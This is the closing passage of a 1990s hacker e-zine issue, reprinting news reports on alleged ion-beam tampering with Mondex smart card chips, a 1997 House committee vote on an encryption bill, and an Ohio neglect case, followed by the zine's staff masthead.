interrogation by some of the leading chip and security laboratories in the
world."

But Mondex was criticized Monday by a leading academic cryptography expert
for underestimating the risks of the card being hacked. Ross Anderson, a
professor at Cambridge University in England, said the technical
sophistication of the security measures taken by Mondex do not reflect the
high level of technology and skills available to criminals.

"I think Mondex picked an inappropriate time to go for a world launch. There
are too many new attacks -- people are looking at things all the time,"
Anderson said. "If something is released today, there is no guarantee it will
be good three months from now. In five or 10 years, things will have
stabilized."

The Mondex card was the subject of rumors earlier this month that it had been
successfully hacked, following a presentation at the Eurocrypt cryptography
conference this summer. The Eurocrypt presentation showed that the surface
wiring of a silicon chip, which was not identified by name, could be
manipulated in a way that allowed access to the information stored inside.

According to a document posted on the Web, Mondex was the subject of the
attack described at Eurocrypt. The anonymous posting said an ion beam was
used to reconnect a link on the surface of a Mondex chip, letting the memory
be output to the card's serial port. Mondex denied the claim Wednesday.

John Beric, head of security at Mondex, said the type of attack described at
Eurocrypt had not been state-of-the-art for many years. He added that the
Mondex chip design was adapted in 1992 to take into account such an attack.
Mondex chips are still tested for attacks such as those described in the
anonymous posting, he said.

"No system is perfect. We go on the contingency that something horrible is
going to happen, and we have contingency plans so we can tolerate a loss and
stem it where we can," Beric said.

Mondex and chip manufacturers argue that the high cost of hacking into a
single chip, " a process which requires skill and expensive equipment," means
hacking cards is uneconomic, because breaking one chip's security doesn't
necessarily breaking into other chips.

"Any chip can be compromised, the question is: How much money does it cost to
compromise the chip? The goal is to make the cost of compromising the chip
greater than the value of compromising the chip," said Thomas Horton, smart
card microchip product manager at Hitachi.

But some academics said the chip industry's cost-benefit argument is flawed.

Hacking, or reconfiguring a chip, "is a routine process," according to John
Orloff, a professor at the Laboratory for Ion Beam Research and Applications
at the University of Maryland, in College Park.

Orloff said a technician with access to a focused ion-beam machine and
intimate knowledge of a chip could "lay down a few microns" and reconstitute
something such as a severed link on a chip in just 30 minutes. The machinery
to do something like that is not cheap, Orloff said, but it is common in
semiconductor labs and universities.

©CMP Media, 1996.
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ

House Panel Rejects Crypto Amendment
by Rebecca Vesely

24.Sep.97.PDT -- After nearly four hours of wrangling, the House Commerce
Committee today passed a market-friendly encryption bill, voting down an
amendment 35-16 that would have imposed strict domestic controls on
encryption.

"Throughout this debate in the past few weeks, the members have been swinging
towards privacy," Representative Edward Markey (D-Massachusetts) told
reporters after the vote. "I think that's going to happen in every single
public debate that's held."

The Security and Freedom through Encryption Act, sponsored by Representative
Bob Goodlatte (R-Virginia), passed in a 40-11 vote with an amendment that
strengthens penalties for using encryption in a crime from five years to 10.
The amendment, sponsored by Markey and Representative Rick White
(R-Washington), also establishes a "national encryption technology center" in
which companies would work with law enforcement on encryption technologies,
although where funding for the center would come from or who would
participate is undefined.

But the committee and the House remain deeply divided over just how much
access law enforcement should have to digital communications. Despite two
weeks of 'round-the-clock staff work and lobbyists haunting members and
aides, panel members could not find a compromise between law enforcement and
privacy concerns. In fact, many could not understand why technology can't
sort the whole mess out.

"If these cryptographers are so smart, why don't they invent some decryption
devices for law enforcement?" asked Representative Mike Oxley (R-Ohio), a
former FBI agent and chief sponsor of the pro-law-enforcement amendment that
failed.

Arguments for the need for law enforcement to access encrypted data surfaced
again and again, as members pointed out that drug cartels use strong
encryption to secure their data.

"Computers and the Internet have become fertile ground for terrorists, drug
cartels, and child pornographers," said Representative Greg Ganske (R-Iowa).

But the committee majority appeared to be swayed by the argument that the
wide availability of strong encryption on the global market made Oxley's
proposal - to prevent all Americans from using encryption without immediate
access to plaintext by law enforcement - illogical.

"This is the Prohibition of the electronic age," said Representative Anna
Eshoo (D-California). "People drank anyway. Liquor was out there, and it was
easy to make."

Markey said the Oxley proposal's requirement for easy access to encrypted
data could become the "Achilles' heel of electronic commerce."

The bill's next test: the House Rules Committee, which will decide in what
form, if any, the bill will reach the House floor. Two weeks ago, the House
Intelligence and National Security committees passed a series of amendments,
one similar to Oxley's, that would undercut the intent of Goodlatte's
original legislation.

Rules Committee chair Gerald Solomon (R-New York) sent a letter to Commerce
Committee members warning them that he will block any variation on the
Goodlatte bill that does not carry the strong key recovery provision Oxley
tried to get passed.

Goodlatte told reporters after the Commerce panel session that he is going to
work immediately to try to get the bill over the next hurdle.

"We are certainly going to be working with the leadership and the Rules
Committee to make sure everybody who has an opinion about this gets heard and
that we design a bill that will have strong bipartisan support," he said.

Goodlatte still faces a long road. The bill has 252 House co-sponsors - a
solid majority should it reach the floor. But it would still have to be
reconciled with radically different Senate legislation and gain President
Clinton's signature before it becomes law.

©1993-97 Wired Ventures, Inc.
ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ

Internet Addict Placed on Probation in Ohio - from FH

CINCINNATI (Reuter) - An Ohio woman described by police as an Internet addict
was placed on two years probation Tuesday for neglecting her three small
children while spending several hours a day on her home computer.

Police said Sandra Hacker, 24, kept her three children in deplorably filthy
conditions in a separate room of her apartment, while devoting her time to the
Internet.

Judge William Mallory of Cincinnati Municipal Court also fined Hacker $100 and
court costs and suspended a 180-day jail sentence on condition that she take
parenting classes under supervision of probation officials.

The children, ages 2, 3, and 5, have been in the custody of her estranged
husband since she was arrested on the neglect charges earlier this year, her
attorney, John Burlew, told Reuters.

Permanent custody rights will be determined in a divorce proceeding in which
the couple is now involved, he said.

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ
Ú--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
: thtj communications, inc.³
ú-ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Editor-in-Chief: Scud-O, scud@thtj.com
Executive Editor: KungFuFox, mazer@cycat.com
Submissions Editor: Keystroke, keystroke@thepentagon.com
Distribution Editor: Malhavoc, malhavoc@thtj.com
Site Manager: Scud-O, scud@thtj.com
Content Editors: FH, fh@sinnerz.com
Malhavoc, malhavoc@thtj.com
Phrax, phrax@thtj.com

Staff Writers: memor, memor@thtj.com
ArcAngel, arcangel@thtj.com
lurk3r,
Shok,
The Messiah, tm@sinnerz.com

ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ

A-th-a-th-a-th-a-that's all folks!

Ú--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
: - End of Communique - ³
ú-ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT